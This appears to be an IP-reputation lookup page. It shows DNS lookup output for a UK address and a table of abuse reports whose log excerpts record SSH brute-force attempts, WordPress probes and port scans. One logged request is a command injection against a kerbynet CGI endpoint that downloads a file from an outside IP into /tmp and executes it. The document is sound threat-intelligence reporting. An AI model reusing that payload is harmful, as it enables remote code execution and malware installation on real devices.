城市(city): unknown
省份(region): unknown
国家(country): United Kingdom of Great Britain and Northern Ireland (the)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 81.21.71.54
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 12518
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;81.21.71.54. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025022200 1800 900 604800 86400
;; Query time: 14 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 22 22:00:17 CST 2025
;; MSG SIZE rcvd: 104
Host 54.71.21.81.in-addr.arpa not found: 2(SERVFAIL)
server can't find 81.21.71.54.in-addr.arpa: SERVFAIL
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 171.25.193.78 | attackspam | Time: Tue Sep 1 04:56:55 2020 +0000 IP: 171.25.193.78 (SE/Sweden/tor-exit4-readme.dfri.se) Failures: 5 (sshd) Interval: 3600 seconds Blocked: Permanent Block [LF_SSHD] Log entries: Sep 1 04:56:42 ca-1-ams1 sshd[7878]: Failed password for root from 171.25.193.78 port 59649 ssh2 Sep 1 04:56:44 ca-1-ams1 sshd[7878]: Failed password for root from 171.25.193.78 port 59649 ssh2 Sep 1 04:56:47 ca-1-ams1 sshd[7878]: Failed password for root from 171.25.193.78 port 59649 ssh2 Sep 1 04:56:50 ca-1-ams1 sshd[7878]: Failed password for root from 171.25.193.78 port 59649 ssh2 Sep 1 04:56:52 ca-1-ams1 sshd[7878]: Failed password for root from 171.25.193.78 port 59649 ssh2 |
2020-09-01 14:33:05 |
| 167.172.207.139 | attackbotsspam | Sep 1 08:05:13 PorscheCustomer sshd[31633]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.207.139 Sep 1 08:05:15 PorscheCustomer sshd[31633]: Failed password for invalid user annie123 from 167.172.207.139 port 54038 ssh2 Sep 1 08:08:47 PorscheCustomer sshd[31691]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.207.139 ... |
2020-09-01 14:21:08 |
| 61.177.172.168 | attackbotsspam | Sep 1 08:41:21 v22019058497090703 sshd[10252]: Failed password for root from 61.177.172.168 port 15520 ssh2 Sep 1 08:41:34 v22019058497090703 sshd[10252]: Failed password for root from 61.177.172.168 port 15520 ssh2 Sep 1 08:41:34 v22019058497090703 sshd[10252]: error: maximum authentication attempts exceeded for root from 61.177.172.168 port 15520 ssh2 [preauth] ... |
2020-09-01 14:57:47 |
| 77.68.4.202 | attackspambots | Sep 1 07:49:26 buvik sshd[21784]: Invalid user one from 77.68.4.202 Sep 1 07:49:26 buvik sshd[21784]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=77.68.4.202 Sep 1 07:49:28 buvik sshd[21784]: Failed password for invalid user one from 77.68.4.202 port 51158 ssh2 ... |
2020-09-01 14:35:50 |
| 162.142.125.22 | attack | SSH break in attempt ... |
2020-09-01 14:30:52 |
| 51.255.45.144 | attack | GET /wp-config.php.old HTTP/1.1 |
2020-09-01 14:25:27 |
| 93.170.59.23 | attackbots | 93.170.59.23 - - \[01/Sep/2020:06:52:58 +0300\] "POST /xmlrpc.php HTTP/1.1" 200 428 "-" "Mozilla/5.0 \(Windows NT 6.1\; Win64\; x64\) AppleWebKit/537.36 \(KHTML, like Gecko\) Chrome/59.0.3071.109 Safari/537.36" "-" 93.170.59.23 - - \[01/Sep/2020:06:53:01 +0300\] "POST /xmlrpc.php HTTP/1.1" 200 428 "-" "Mozilla/5.0 \(Windows NT 6.1\; Win64\; x64\) AppleWebKit/537.36 \(KHTML, like Gecko\) Chrome/59.0.3071.109 Safari/537.36" "-" ... |
2020-09-01 15:03:22 |
| 106.12.84.4 | attack | $f2bV_matches |
2020-09-01 14:39:51 |
| 167.248.133.33 | attack | Unauthorized connection attempt detected from IP address 167.248.133.33 to port 3390 [T] |
2020-09-01 14:48:41 |
| 185.81.157.132 | attackbots | Automatic report - Banned IP Access |
2020-09-01 14:18:24 |
| 23.98.152.191 | attackbots | webserver:80 [01/Sep/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [31/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [31/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [30/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 |
2020-09-01 14:37:07 |
| 111.229.128.34 | attackbotsspam | Sep 1 06:05:38 vps-51d81928 sshd[144244]: Invalid user tom from 111.229.128.34 port 52340 Sep 1 06:05:38 vps-51d81928 sshd[144244]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.229.128.34 Sep 1 06:05:38 vps-51d81928 sshd[144244]: Invalid user tom from 111.229.128.34 port 52340 Sep 1 06:05:39 vps-51d81928 sshd[144244]: Failed password for invalid user tom from 111.229.128.34 port 52340 ssh2 Sep 1 06:09:11 vps-51d81928 sshd[144286]: Invalid user francois from 111.229.128.34 port 34218 ... |
2020-09-01 14:56:06 |
| 139.59.243.224 | attackspambots | Sep 1 13:06:06 webhost01 sshd[3876]: Failed password for root from 139.59.243.224 port 54570 ssh2 ... |
2020-09-01 14:30:23 |
| 185.220.102.251 | attackbots | Sep 1 06:10:48 ssh2 sshd[80532]: User root from tor-exit-relay-5.anonymizing-proxy.digitalcourage.de not allowed because not listed in AllowUsers Sep 1 06:10:48 ssh2 sshd[80532]: Failed password for invalid user root from 185.220.102.251 port 26436 ssh2 Sep 1 06:10:49 ssh2 sshd[80532]: Failed password for invalid user root from 185.220.102.251 port 26436 ssh2 ... |
2020-09-01 14:17:17 |
| 216.239.90.19 | attackbots | OpenSSL TLS Heartbleed Vulnerability |
2020-09-01 14:32:46 |